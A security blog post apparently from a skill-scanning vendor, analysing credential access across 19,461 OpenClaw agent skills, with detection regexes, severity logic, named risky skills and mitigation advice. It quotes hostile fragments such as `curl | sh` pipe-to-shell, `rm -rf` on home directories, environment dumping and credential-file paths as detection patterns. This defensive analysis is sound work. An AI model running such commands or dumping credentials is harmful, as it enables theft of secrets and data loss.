3,326 OpenClaw Skills Can Access Your Credentials. Here's What That Means.
March 10, 2026 · 7 min read · By 4Worlds
When you install an AI agent skill, you're trusting it with your environment. That includes your API keys, tokens, and secrets stored in environment variables. After scanning all 19,461 skills in the OpenClaw registry, we found that 3,326 of them access credentials in some form. That's 17.1% of the entire ecosystem.
Not all of them are malicious. Many skills legitimately need an API key to function. But 1,247 of those credential-accessing skills scored as Dangerous, and 1,909 of them also make outbound network requests. That combination is the textbook pattern for credential exfiltration.
What "credential access" means in practice
ClawAudit flags a skill for credential access when its code reads environment variables, references well-known secret paths, or accesses credential stores. The most common patterns:
- Environment variable reads: `process.env.API_KEY`, `os.environ.get("SECRET")`, or `${OPENAI_API_KEY}` in shell commands
- Cloud credential paths: `~/.aws/credentials`, `~/.config/gcloud`, `~/.kube/config`
- Dotenv loading: `require('dotenv')` or reading `.env` files directly
- Process environment enumeration: `Object.keys(process.env)` or `/proc/self/environ` reads that dump all environment variables at once
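In practice, flagging these patterns amounts to pattern matching over source text. Here is a minimal sketch in Python; the regexes and the `scan_source` helper are illustrative simplifications, not ClawAudit's actual detection rules:

```python
import re

# Simplified stand-ins for the patterns above -- illustrative regexes,
# not ClawAudit's actual detection rules.
CREDENTIAL_PATTERNS = {
    "env_read": re.compile(
        r"process\.env\.\w+|os\.environ(\.get)?|\$\{?[A-Z_]*(KEY|TOKEN|SECRET)[A-Z_]*\}?"
    ),
    "cloud_path": re.compile(r"\.aws/credentials|\.config/gcloud|\.kube/config"),
    "dotenv": re.compile(r"require\(['\"]dotenv['\"]\)|['\"]\.env['\"]"),
    "env_dump": re.compile(r"Object\.keys\(process\.env\)|/proc/self/environ"),
}

def scan_source(source: str) -> list[str]:
    """Return the names of credential-access patterns found in source text."""
    return [name for name, rx in CREDENTIAL_PATTERNS.items() if rx.search(source)]

snippet = 'const key = process.env.API_KEY; fs.readFileSync(home + "/.aws/credentials")'
print(scan_source(snippet))  # -> ['env_read', 'cloud_path']
```

A real scanner works on parsed ASTs rather than raw regexes, but the idea is the same: each match becomes a finding that feeds the score.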
The dangerous combination: credentials + network
A skill reading `process.env.API_KEY` is not automatically dangerous. Most API wrapper skills need a key to call their target service. The threat emerges when credential access combines with other capabilities.
When a skill reads your API key, base64-encodes it, and sends it to an external server, ClawAudit flags that as a compound threat: "credential theft" or "encoded exfiltration." These compound detections carry critical severity because each step in the chain has a clear purpose in an attack.
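The escalation logic can be sketched as a check over detected capability sets. The capability names and tier labels below are assumptions for illustration, not ClawAudit's real taxonomy:

```python
# Illustrative compound-threat logic: severity escalates only when the
# capabilities that form an attack chain appear together. Capability
# names and tier labels are assumptions, not ClawAudit's real taxonomy.
EXFIL_CHAIN = {"credential_access", "data_encoding", "network_egress"}

def classify(capabilities: set[str]) -> str:
    if EXFIL_CHAIN <= capabilities:
        # Full read -> encode -> send chain: "encoded exfiltration"
        return "critical: encoded exfiltration"
    if {"credential_access", "network_egress"} <= capabilities:
        # Key read plus outbound traffic: "credential theft" pattern
        return "high: credential theft pattern"
    if "credential_access" in capabilities:
        # A lone key read is a finding, not a verdict
        return "finding: credential access"
    return "none"

print(classify({"credential_access", "data_encoding", "network_egress"}))
# -> critical: encoded exfiltration
```

The point of compound detection is that no single capability in the chain is damning; it is the combination that matches an attack shape.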
Real examples from the registry
Here are actual skills from the OpenClaw registry that demonstrate the patterns we detect. Each of these scored 20 out of 100 (Dangerous).
Pipe-to-shell with credential access
appback/gridclash combines file read, file write, credential access, and outbound network requests. It contains pipe-to-python patterns (`curl ... | python`) that download and execute remote code. It also has a hardcoded credential in the source. Four compound threats detected.
Unicode homoglyphs hiding shell injection
byron-mckeeby/ethereum-read-only sounds harmless. "Read only." But it uses Unicode homoglyph characters to evade keyword detection, contains `curl | sh` patterns (a supply chain attack vector), and accesses credentials alongside dynamic eval and data encoding. Four compound threats.
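Homoglyph evasion can often be surfaced with Unicode normalization. A minimal sketch, assuming NFKC folding as the check; a production scanner would also consult a confusables table (Unicode TR39), since Cyrillic lookalikes survive NFKC unchanged:

```python
import unicodedata

def find_homoglyphs(source: str) -> list[tuple[str, str]]:
    """Report non-ASCII characters whose NFKC form folds to ASCII -- one way
    fullwidth letters sneak 'curl' or 'eval' past naive keyword filters."""
    hits = []
    for ch in source:
        if ch.isascii():
            continue
        folded = unicodedata.normalize("NFKC", ch)
        if folded != ch and folded.isascii():
            hits.append((ch, folded))
    return hits

# Fullwidth Latin letters fold to ASCII under NFKC; Cyrillic lookalikes do
# not, which is why a confusables table is still needed on top of this.
print(find_homoglyphs("ｃｕｒｌ https://example.com | sh"))  # fullwidth "curl"
```

A plain keyword grep for `curl` misses the fullwidth string entirely, while a shell that receives it after normalization executes it just the same.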
Destructive commands with credential theft
c4chuan/idea-storm has process execution, network access, package installation, file reads, and credential access. It contains `rm -rf` commands targeting root or home directories, Unicode homoglyphs, and a hardcoded credential. Five capabilities, four compound threats.
The legitimate vs. malicious spectrum
Of the 3,326 skills with credential access:
- 1,247 are Dangerous (37.5%) with critical findings and compound threats
- 1,454 are Risky (43.7%) with significant concerns that warrant manual review
- 625 are Caution (18.8%) with minor issues, likely legitimate but worth checking
- 0 are Trusted because any credential access pattern adds findings that lower the score
The zero in the Trusted tier is by design. Even a well-built skill that accesses `process.env.API_KEY` gets a credential access finding. That doesn't make it malicious, but it does mean you should review what it does with that key. A Caution-tier skill that reads one key to call one API is different from a Dangerous-tier skill that enumerates all your environment variables and sends them to an unknown server.
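In code, the two ends of that spectrum look roughly like this (a Python illustration; the key name `SLACK_TOKEN` is hypothetical):

```python
import os

# Caution end of the spectrum: read one named key, for one stated purpose.
api_key = os.environ.get("SLACK_TOKEN")  # hypothetical key name

# Dangerous end: enumerate everything at once. Paired with an outbound
# network request, this is the exfiltration-shaped pattern described above.
all_secrets = dict(os.environ)  # every key, token, and secret in the session
```

The first line can only leak what you deliberately handed over; the second grabs whatever happens to be in scope.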
Credential stores: the 109 worst offenders
Beyond reading environment variables, 109 skills interact with credential storage systems: writing to keychains, modifying `.ssh` directories, or creating credential files. Of those, 57 are Dangerous.
Skills like happydog-intj/github-passwordless-setup and kakatkarakshay/proton-pass interact with credential stores, install packages, and make network requests. Whether they're doing what they claim or something else entirely requires more than reading the description.
How to protect yourself
- Audit every skill before installing. Run it through ClawAudit or the API. If it scores below 40, read the findings carefully before proceeding.
- Check what credentials it needs and why. A Slack integration skill needs a Slack token. It should not also need your AWS_SECRET_ACCESS_KEY.
- Watch for credential + network combinations. If a skill reads your keys and makes outbound requests, verify where those requests go. The registry shows capability combinations for every scanned skill.
- Use scoped credentials. Give skills the minimum permissions they need. A read-only API key is better than a full-access key. A project-scoped token is better than an account-wide one.
- Rotate keys if you've installed a flagged skill. If you've already installed a skill that ClawAudit flags as Dangerous with credential access, rotate the affected keys. The skill may have already exfiltrated them.
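Until per-skill scoping exists, one practical mitigation is to launch skills with an allowlisted environment rather than your full one. A crude sketch in Python; the helper name and key names are illustrative, and OpenClaw itself provides no such feature:

```python
import os
import subprocess

def run_with_scoped_env(cmd: list[str], allowed: set[str]) -> int:
    """Run a command with only an allowlisted slice of the environment.
    A crude stand-in for per-skill credential scoping; names here are
    illustrative, and OpenClaw provides no built-in equivalent."""
    minimal_env = {k: v for k, v in os.environ.items() if k in allowed}
    # Keep PATH so the child process can still resolve executables.
    minimal_env.setdefault("PATH", os.environ.get("PATH", "/usr/bin:/bin"))
    return subprocess.run(cmd, env=minimal_env).returncode

# A Slack skill gets its token and nothing else -- no AWS keys, no GitHub
# tokens, regardless of what the parent environment contains.
run_with_scoped_env(["env"], allowed={"SLACK_TOKEN"})
```

It is a blunt instrument, but it converts "every skill can read every key" into "a skill reads only what you passed it."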
The bigger picture
Credential theft in AI agent skills is a supply chain problem. The OpenClaw ecosystem has no built-in credential sandboxing. When you give an agent access to your environment, every installed skill can read every key. There's no per-skill permission scoping, no runtime isolation, and no audit trail for credential access.
Until that changes, static analysis is the best pre-installation defense. We can't tell you whether a skill will steal your keys. But we can tell you which skills can, and which ones show patterns consistent with doing exactly that.
Browse the full skill registry to check any skill's credential access status, or read the State of OpenClaw Security report for the complete ecosystem analysis. For more on how attacks work in this space, see our posts on prompt injection and the most dangerous skills we found.